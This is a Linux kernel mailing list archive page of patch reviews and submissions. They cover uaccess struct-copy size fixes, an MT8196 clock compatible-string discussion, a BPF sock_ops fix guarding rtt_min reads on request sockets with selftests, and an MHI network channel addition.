From: Aleksa Sarai @ 2026-04-09  6:37 UTC (permalink / raw)
  To: Stefan Metzmacher
  Cc: linux-kernel, Dmitry Safonov, Dmitry Safonov, Francesco Ruggeri,
	Salam Noureddine, David Ahern, David S . Miller, Michal Luczaj,
	David Wei, Luiz Augusto von Dentz, Luiz Augusto von Dentz,
	Marcel Holtmann, Xin Long, Eric Dumazet, Kuniyuki Iwashima,
	Paolo Abeni, Willem de Bruijn, Neal Cardwell, Jakub Kicinski,
	Simon Horman, Christian Brauner, Kees Cook, netdev,
	linux-bluetooth
In-Reply-To: <cfaedbc33ae9d36adaabf04fa79424f30ff1efdd.1775576651.git.metze@samba.org>

[-- Attachment #1: Type: text/plain, Size: 2936 bytes --]

On 2026-04-07, Stefan Metzmacher <metze@samba.org> wrote:
> copy_struct_from_user will never hit the check_zeroed_user() call
> and will never return -E2BIG if new userspace passed new bits in a
> larger structure than the current kernel structure.
> 
> As far as I can there are no critical/related uapi changes in
> 
> - include/net/bluetooth/bluetooth.h and net/bluetooth/sco.c
>   after the use of copy_struct_from_sockptr in v6.13-rc3
> - include/uapi/linux/tcp.h and net/ipv4/tcp_ao.c
>   after the use of copy_struct_from_sockptr in v6.6-rc1
> 
> So that new callers will get the correct behavior from the start.
> 
> Fixes: 4954f17ddefc ("net/tcp: Introduce TCP_AO setsockopt()s")
> Fixes: ef84703a911f ("net/tcp: Add TCP-AO getsockopt()s")
> Fixes: faadfaba5e01 ("net/tcp: Add TCP_AO_REPAIR")
> Fixes: 3e643e4efa1e ("Bluetooth: Improve setsockopt() handling of malformed user input")
> Cc: Dmitry Safonov <0x7f454c46@gmail.com>
> Cc: Dmitry Safonov <dima@arista.com>
> Cc: Francesco Ruggeri <fruggeri@arista.com>
> Cc: Salam Noureddine <noureddine@arista.com>
> Cc: David Ahern <dsahern@kernel.org>
> Cc: David S. Miller <davem@davemloft.net>
> Cc: Michal Luczaj <mhal@rbox.co>
> Cc: David Wei <dw@davidwei.uk>
> Cc: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
> Cc: Luiz Augusto von Dentz <luiz.dentz@gmail.com>
> Cc: Marcel Holtmann <marcel@holtmann.org>
> Cc: Xin Long <lucien.xin@gmail.com>
> Cc: Eric Dumazet <edumazet@google.com>
> Cc: Kuniyuki Iwashima <kuniyu@google.com>
> Cc: Paolo Abeni <pabeni@redhat.com>
> Cc: Willem de Bruijn <willemb@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
> Cc: Jakub Kicinski <kuba@kernel.org>
> Cc: Simon Horman <horms@kernel.org>
> Cc: Aleksa Sarai <cyphar@cyphar.com>
> Cc: Christian Brauner <brauner@kernel.org>
> CC: Kees Cook <keescook@chromium.org>
> Cc: netdev@vger.kernel.org
> Cc: linux-bluetooth@vger.kernel.org
> Cc: linux-kernel@vger.kernel.org
> Signed-off-by: Stefan Metzmacher <metze@samba.org>
> ---
>  include/linux/sockptr.h | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
> 
> diff --git a/include/linux/sockptr.h b/include/linux/sockptr.h
> index 3e6c8e9d67ae..ba88f4d78c1b 100644
> --- a/include/linux/sockptr.h
> +++ b/include/linux/sockptr.h
> @@ -91,7 +91,7 @@ static inline int copy_struct_from_sockptr(void *dst, size_t ksize,
>  	size_t rest = max(ksize, usize) - size;
>  
>  	if (!sockptr_is_kernel(src))
> -		return copy_struct_from_user(dst, ksize, src.user, size);
> +		return copy_struct_from_user(dst, ksize, src.user, usize);
>  
>  	if (usize < ksize) {
>  		memset(dst + size, 0, rest);

It is a little weird that this function open-codes memchr_inv() --
check_zeroed_sockptr() exists and does the right thing. Maybe it'd be
nice to fix that too?

In any case,

Reviewed-by: Aleksa Sarai <aleksa@amutable.com>

-- 
Aleksa Sarai
https://www.cyphar.com/

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 265 bytes --]

^ permalink raw reply

* Re: [PATCH 1/5] uaccess: fix ignored_trailing logic in copy_struct_to_user()
From: Aleksa Sarai @ 2026-04-09  6:33 UTC (permalink / raw)
  To: Stefan Metzmacher
  Cc: linux-kernel, Dmitry Safonov, Dmitry Safonov, Francesco Ruggeri,
	Salam Noureddine, David Ahern, David S . Miller, Michal Luczaj,
	David Wei, Luiz Augusto von Dentz, Luiz Augusto von Dentz,
	Marcel Holtmann, Xin Long, Eric Dumazet, Kuniyuki Iwashima,
	Paolo Abeni, Willem de Bruijn, Neal Cardwell, Jakub Kicinski,
	Simon Horman, Christian Brauner, Kees Cook, netdev,
	linux-bluetooth
In-Reply-To: <71f69442410c1186ed8ce6d5b4b9d4a5a70edbad.1775576651.git.metze@samba.org>

[-- Attachment #1: Type: text/plain, Size: 3360 bytes --]

On 2026-04-07, Stefan Metzmacher <metze@samba.org> wrote:
> Currently all callers pass ignored_trailing=NULL, but I have
> code that will make use of.
> 
> Now it actually behaves like documented:
> 
> * If @usize < @ksize, then the kernel is trying to pass userspace a newer
>   struct than it supports. Thus we only copy the interoperable portions
>   (@usize) and ignore the rest (but @ignored_trailing is set to %true if
>   any of the trailing (@ksize - @usize) bytes are non-zero).

Good catch, though I want to mention that the current API design for
copy_struct_to_user() is a bit of a compromise -- I was trying to think
of a way of making it generic but what information you need really
depends on your API.

For request-flag APIs (like statx) then you can just unset the bits in
the response mask for fields past usize and so it is a non-fatal error,
but it requires knowing which field offsets map to which flags.

My initial idea for ignored_trailing was for it to return the offset
memchr_inv() gives you -- but unfortunately, this doesn't help in the
more generic case where you have multiple non-zero bits that need to
unset multiple flags.

Out of interest, how did you plan on using it? It might be a good idea
to rethink this API before it starts getting used "in anger" in a way
that leaks to uAPIs we can't change.

In any case, for this patch feel free to take my

Reviewed-by: Aleksa Sarai <aleksa@amutable.com>

> Fixes: 424a55a4a908 ("uaccess: add copy_struct_to_user helper")
> Cc: Dmitry Safonov <0x7f454c46@gmail.com>
> Cc: Dmitry Safonov <dima@arista.com>
> Cc: Francesco Ruggeri <fruggeri@arista.com>
> Cc: Salam Noureddine <noureddine@arista.com>
> Cc: David Ahern <dsahern@kernel.org>
> Cc: David S. Miller <davem@davemloft.net>
> Cc: Michal Luczaj <mhal@rbox.co>
> Cc: David Wei <dw@davidwei.uk>
> Cc: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
> Cc: Luiz Augusto von Dentz <luiz.dentz@gmail.com>
> Cc: Marcel Holtmann <marcel@holtmann.org>
> Cc: Xin Long <lucien.xin@gmail.com>
> Cc: Eric Dumazet <edumazet@google.com>
> Cc: Kuniyuki Iwashima <kuniyu@google.com>
> Cc: Paolo Abeni <pabeni@redhat.com>
> Cc: Willem de Bruijn <willemb@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
> Cc: Jakub Kicinski <kuba@kernel.org>
> Cc: Simon Horman <horms@kernel.org>
> Cc: Aleksa Sarai <cyphar@cyphar.com>
> Cc: Christian Brauner <brauner@kernel.org>
> CC: Kees Cook <keescook@chromium.org>
> Cc: netdev@vger.kernel.org
> Cc: linux-bluetooth@vger.kernel.org
> Cc: linux-kernel@vger.kernel.org
> Signed-off-by: Stefan Metzmacher <metze@samba.org>
> ---
>  include/linux/uaccess.h | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
> 
> diff --git a/include/linux/uaccess.h b/include/linux/uaccess.h
> index 4fe63169d5a2..1234b5fa4761 100644
> --- a/include/linux/uaccess.h
> +++ b/include/linux/uaccess.h
> @@ -505,7 +505,7 @@ copy_struct_to_user(void __user *dst, size_t usize, const void *src,
>  			return -EFAULT;
>  	}
>  	if (ignored_trailing)
> -		*ignored_trailing = ksize < usize &&
> +		*ignored_trailing = usize < ksize &&
>  			memchr_inv(src + size, 0, rest) != NULL;
>  	/* Copy the interoperable parts of the struct. */
>  	if (copy_to_user(dst, src, size))
> -- 
> 2.43.0
> 

-- 
Aleksa Sarai
https://www.cyphar.com/

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 265 bytes --]

^ permalink raw reply

* Re: [PATCH v5 23/27] clk: mediatek: Add MT8196 disp-ao clock support
From: Jason-JH Lin (林睿祥) @ 2026-04-09  6:30 UTC (permalink / raw)
  To: aford173@gmail.com
  Cc: Guangjie Song (宋光杰), robh@kernel.org,
	kernel@collabora.com, Sirius Wang (王皓昱),
	Nancy Lin (林欣螢), AngeloGioacchino Del Regno,
	linux-mediatek@lists.infradead.org, conor+dt@kernel.org,
	mturquette@baylibre.com, richardcochran@gmail.com,
	Project_Global_Chrome_Upstream_Group, devicetree@vger.kernel.org,
	linux-kernel@vger.kernel.org, krzk+dt@kernel.org, Laura Nao,
	Nicolas Prado, p.zabel@pengutronix.de,
	Singo Chang (張興國),
	Paul-pl Chen (陳柏霖), wenst@chromium.org,
	linux-arm-kernel@lists.infradead.org, netdev@vger.kernel.org,
	linux-clk@vger.kernel.org, matthias.bgg@gmail.com,
	sboyd@kernel.org
In-Reply-To: <CAHCN7x+K25H-QWLDA6SoGSzxv9koO0wFOrjfWNePc+0AfjCVZg@mail.gmail.com>

> 
[snip]

> > > > > +static const struct of_device_id
> > > > > of_match_clk_mt8196_vdisp_ao[]
> > > > > = {
> > > > > + { .compatible = "mediatek,mt8196-vdisp-ao", .data =
> > > > > &mm_v_mcd },
> > > > 
> > > > Hi Laura,
> > > > 
> > > > We are going to send mtk-mmsys driver for MT8196 recently, but
> > > > we
> > > > found
> > > > the compatible name is used here.
> > > > 
> > > > As your commit message, vdisp-ao is integrated with the mtk-
> > > > mmsys
> > > > driver, which registers the vdisp-ao clock driver via 
> > > > platform_device_register_data().
> > > > 
> > > > Shouldn't this compatible name belong to mmsys driver for
> > > > MT8196?
> > > > 
> > > 
> > > That's right, my fault for missing that! Thanks for the heads up.
> > > 
> > > I'm aware Angelo is currently restructuring mediatek-drm
> > > (including 
> > > mmsys and mutex), and that might affect the way vdisp-ao is
> > > loaded
> > > too. 
> > > So I'm not sure whether it makes sense to send a patch to fix
> > > this 
> > > right away.
> > 
> > OK, we'll try to contact Angelo from other places.
> > Thanks for your confirmation!
> > 
> 
> 
> If anyone wants me to test anything, I have a Chromebook with the
> mt8196 that I can test code, so feel free to CC me on anything that
> you want tested.  I'd love to see this stuff pushed upstream.
> 
> thanks
> 
> adam 

Hi Adam,
However, we still need some more time to discuss and refactor this.
We'll send the new patch if necessary.
Thank you for your help!

Regards,
Jason-JH Lin

> > 
> > Regards,
> > Jason-JH.Lin
> > 
> > > 
> > > Best,
> > > 
> > > Laura
> > > 
> > 


^ permalink raw reply

* [PATCH v2] bpf: guard sock_ops rtt_min access with is_locked_tcp_sock
From: Werner Kasselman @ 2026-04-09  6:10 UTC (permalink / raw)
  To: Martin KaFai Lau
  Cc: Alexei Starovoitov, Daniel Borkmann, Andrii Nakryiko,
	John Fastabend, David S . Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Shuah Khan, bpf@vger.kernel.org,
	netdev@vger.kernel.org, linux-kernel@vger.kernel.org,
	linux-kselftest@vger.kernel.org, stable@vger.kernel.org,
	Werner Kasselman
In-Reply-To: <20260406224953.2787289-1-werner@verivus.com>

sock_ops_convert_ctx_access() emits guarded reads for tcp_sock-backed
bpf_sock_ops fields such as snd_cwnd, srtt_us, snd_ssthresh, rcv_nxt,
snd_nxt, snd_una, mss_cache, ecn_flags, rate_delivered, and
rate_interval_us. Those accesses go through SOCK_OPS_GET_TCP_SOCK_FIELD(),
which checks is_locked_tcp_sock before dereferencing sock_ops.sk.

The rtt_min case is different. Because it reads a subfield of
struct minmax, it uses a custom open-coded load sequence instead of the
usual helper macro, and that sequence currently dereferences sock_ops.sk
without checking is_locked_tcp_sock first.

This is unsafe when sock_ops.sk points to a request_sock-backed object
instead of a locked full tcp_sock. That is reachable not only from the
SYNACK header option callbacks, but also from other request_sock-backed
sock_ops callbacks such as BPF_SOCK_OPS_TIMEOUT_INIT,
BPF_SOCK_OPS_RWND_INIT, and BPF_SOCK_OPS_NEEDS_ECN. In those cases,
reading ctx->rtt_min makes the generated code treat a request_sock as a
tcp_sock and read beyond the end of the request_sock allocation.

Fix the rtt_min conversion by adding the same is_locked_tcp_sock guard
used for the other tcp_sock field reads. Also make the accessed subfield
explicit by using offsetof(struct minmax_sample, v).

Add a selftest that verifies request_sock-backed sock_ops callbacks see
ctx->rtt_min as zero after the fix.

Found via AST-based call-graph analysis using sqry.

Fixes: 44f0e43037d3 ("bpf: Add support for reading sk_state and more")
Cc: stable@vger.kernel.org
Signed-off-by: Werner Kasselman <werner@verivus.com>
---
 net/core/filter.c                             | 53 +++++++++++++++----
 .../selftests/bpf/prog_tests/tcpbpf_user.c    |  9 ++++
 .../selftests/bpf/progs/test_tcpbpf_kern.c    | 21 ++++++++
 tools/testing/selftests/bpf/test_tcpbpf.h     |  6 +++
 4 files changed, 79 insertions(+), 10 deletions(-)

diff --git a/net/core/filter.c b/net/core/filter.c
index 78b548158..5040bf7e4 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -10827,16 +10827,49 @@ static u32 sock_ops_convert_ctx_access(enum bpf_access_type type,
 	case offsetof(struct bpf_sock_ops, rtt_min):
 		BUILD_BUG_ON(sizeof_field(struct tcp_sock, rtt_min) !=
 			     sizeof(struct minmax));
-		BUILD_BUG_ON(sizeof(struct minmax) <
-			     sizeof(struct minmax_sample));
-
-		*insn++ = BPF_LDX_MEM(BPF_FIELD_SIZEOF(
-						struct bpf_sock_ops_kern, sk),
-				      si->dst_reg, si->src_reg,
-				      offsetof(struct bpf_sock_ops_kern, sk));
-		*insn++ = BPF_LDX_MEM(BPF_W, si->dst_reg, si->dst_reg,
-				      offsetof(struct tcp_sock, rtt_min) +
-				      sizeof_field(struct minmax_sample, t));
+		BUILD_BUG_ON(sizeof_field(struct bpf_sock_ops, rtt_min) !=
+			     sizeof_field(struct minmax_sample, v));
+		off = offsetof(struct tcp_sock, rtt_min) +
+		      offsetof(struct minmax_sample, v);
+
+		{
+			int fullsock_reg = si->dst_reg, reg = BPF_REG_9, jmp = 2;
+
+			if (si->dst_reg == reg || si->src_reg == reg)
+				reg--;
+			if (si->dst_reg == reg || si->src_reg == reg)
+				reg--;
+			if (si->dst_reg == si->src_reg) {
+				*insn++ = BPF_STX_MEM(BPF_DW, si->src_reg, reg,
+						      offsetof(struct bpf_sock_ops_kern,
+							       temp));
+				fullsock_reg = reg;
+				jmp += 2;
+			}
+			*insn++ = BPF_LDX_MEM(BPF_FIELD_SIZEOF(
+							struct bpf_sock_ops_kern,
+							is_locked_tcp_sock),
+					      fullsock_reg, si->src_reg,
+					      offsetof(struct bpf_sock_ops_kern,
+						       is_locked_tcp_sock));
+			*insn++ = BPF_JMP_IMM(BPF_JEQ, fullsock_reg, 0, jmp);
+			if (si->dst_reg == si->src_reg)
+				*insn++ = BPF_LDX_MEM(BPF_DW, reg, si->src_reg,
+						      offsetof(struct bpf_sock_ops_kern,
+							       temp));
+			*insn++ = BPF_LDX_MEM(BPF_FIELD_SIZEOF(
+							struct bpf_sock_ops_kern, sk),
+					      si->dst_reg, si->src_reg,
+					      offsetof(struct bpf_sock_ops_kern, sk));
+			*insn++ = BPF_LDX_MEM(BPF_W, si->dst_reg, si->dst_reg,
+					      off);
+			if (si->dst_reg == si->src_reg) {
+				*insn++ = BPF_JMP_A(1);
+				*insn++ = BPF_LDX_MEM(BPF_DW, reg, si->src_reg,
+						      offsetof(struct bpf_sock_ops_kern,
+							       temp));
+			}
+		}
 		break;
 
 	case offsetof(struct bpf_sock_ops, bpf_sock_ops_cb_flags):
diff --git a/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c b/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c
index 7e8fe1bad..d243d6713 100644
--- a/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c
+++ b/tools/testing/selftests/bpf/prog_tests/tcpbpf_user.c
@@ -42,6 +42,15 @@ static void verify_result(struct tcpbpf_globals *result)
 	/* check getsockopt for window_clamp */
 	ASSERT_EQ(result->window_clamp_client, 9216, "window_clamp_client");
 	ASSERT_EQ(result->window_clamp_server, 9216, "window_clamp_server");
+
+	ASSERT_EQ(result->timeout_init_req_seen, 1, "timeout_init_req_seen");
+	ASSERT_EQ(result->timeout_init_req_rtt_min, 0, "timeout_init_req_rtt_min");
+
+	ASSERT_EQ(result->rwnd_init_req_seen, 1, "rwnd_init_req_seen");
+	ASSERT_EQ(result->rwnd_init_req_rtt_min, 0, "rwnd_init_req_rtt_min");
+
+	ASSERT_EQ(result->needs_ecn_req_seen, 1, "needs_ecn_req_seen");
+	ASSERT_EQ(result->needs_ecn_req_rtt_min, 0, "needs_ecn_req_rtt_min");
 }
 
 static void run_test(struct tcpbpf_globals *result)
diff --git a/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c b/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c
index 6935f32ee..79757a19b 100644
--- a/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c
+++ b/tools/testing/selftests/bpf/progs/test_tcpbpf_kern.c
@@ -85,6 +85,27 @@ int bpf_testcb(struct bpf_sock_ops *skops)
 	global.event_map |= (1 << op);
 
 	switch (op) {
+	case BPF_SOCK_OPS_TIMEOUT_INIT:
+		if (!skops->is_fullsock) {
+			global.timeout_init_req_seen = 1;
+			global.timeout_init_req_rtt_min = skops->rtt_min;
+		}
+		rv = -1;
+		break;
+	case BPF_SOCK_OPS_RWND_INIT:
+		if (!skops->is_fullsock) {
+			global.rwnd_init_req_seen = 1;
+			global.rwnd_init_req_rtt_min = skops->rtt_min;
+		}
+		rv = 0;
+		break;
+	case BPF_SOCK_OPS_NEEDS_ECN:
+		if (!skops->is_fullsock) {
+			global.needs_ecn_req_seen = 1;
+			global.needs_ecn_req_rtt_min = skops->rtt_min;
+		}
+		rv = 0;
+		break;
 	case BPF_SOCK_OPS_TCP_CONNECT_CB:
 		rv = bpf_setsockopt(skops, SOL_TCP, TCP_WINDOW_CLAMP,
 				    &window_clamp, sizeof(window_clamp));
diff --git a/tools/testing/selftests/bpf/test_tcpbpf.h b/tools/testing/selftests/bpf/test_tcpbpf.h
index 9dd9b5590..46500c1d6 100644
--- a/tools/testing/selftests/bpf/test_tcpbpf.h
+++ b/tools/testing/selftests/bpf/test_tcpbpf.h
@@ -18,5 +18,11 @@ struct tcpbpf_globals {
 	__u32 tcp_saved_syn;
 	__u32 window_clamp_client;
 	__u32 window_clamp_server;
+	__u32 timeout_init_req_seen;
+	__u32 timeout_init_req_rtt_min;
+	__u32 rwnd_init_req_seen;
+	__u32 rwnd_init_req_rtt_min;
+	__u32 needs_ecn_req_seen;
+	__u32 needs_ecn_req_rtt_min;
 };
 #endif
-- 
2.43.0


^ permalink raw reply related

* [PATCH v10 2/2] net: mhi: Add IP_SW1 interface for M-plane support over MHI
From: Vivek Pernamitta @ 2026-04-09  6:08 UTC (permalink / raw)
  To: Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni
  Cc: netdev, linux-kernel, Vivek Pernamitta
In-Reply-To: <20260409-vdev_b1_eth_b1_next-20260408-v10-0-6d44ca48f189@oss.qualcomm.com>

Introduce the IP_SW1 channel to represent the network interface
exposed by the MHI device for M-plane communication. The driver
creates a corresponding netdev, allowing the host to access the
device network interface over MHI.

This interface enables support for O-RAN M-plane management
between O-DU and O-RU, including capability exchange, configuration
management, performance monitoring, and fault management using
NETCONF/YANG, as defined by O-RAN WG4 M-plane specifications.

Signed-off-by: Vivek Pernamitta <vivek.pernamitta@oss.qualcomm.com>
---
 drivers/net/mhi_net.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/net/mhi_net.c b/drivers/net/mhi_net.c
index 47b8617de027980a69c57261a9b4bcefc828dc96..e285aa289cb945cd1afd2f3d581214f2f2f15145 100644
--- a/drivers/net/mhi_net.c
+++ b/drivers/net/mhi_net.c
@@ -430,6 +430,7 @@ static const struct mhi_device_id mhi_net_id_table[] = {
 	{ .chan = "IP_HW0", .driver_data = (kernel_ulong_t)&mhi_hwip0 },
 	/* Software data PATH (to modem CPU) */
 	{ .chan = "IP_SW0", .driver_data = (kernel_ulong_t)&mhi_swip0 },
+	{ .chan = "IP_SW1", .driver_data = (kernel_ulong_t)&mhi_swip0 },
 	{ .chan = "IP_ETH0", .driver_data = (kernel_ulong_t)&mhi_eth0 },
 	{ .chan = "IP_ETH1", .driver_data = (kernel_ulong_t)&mhi_eth0 },
 	{}

-- 
2.34.1


^ permalink raw reply related


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox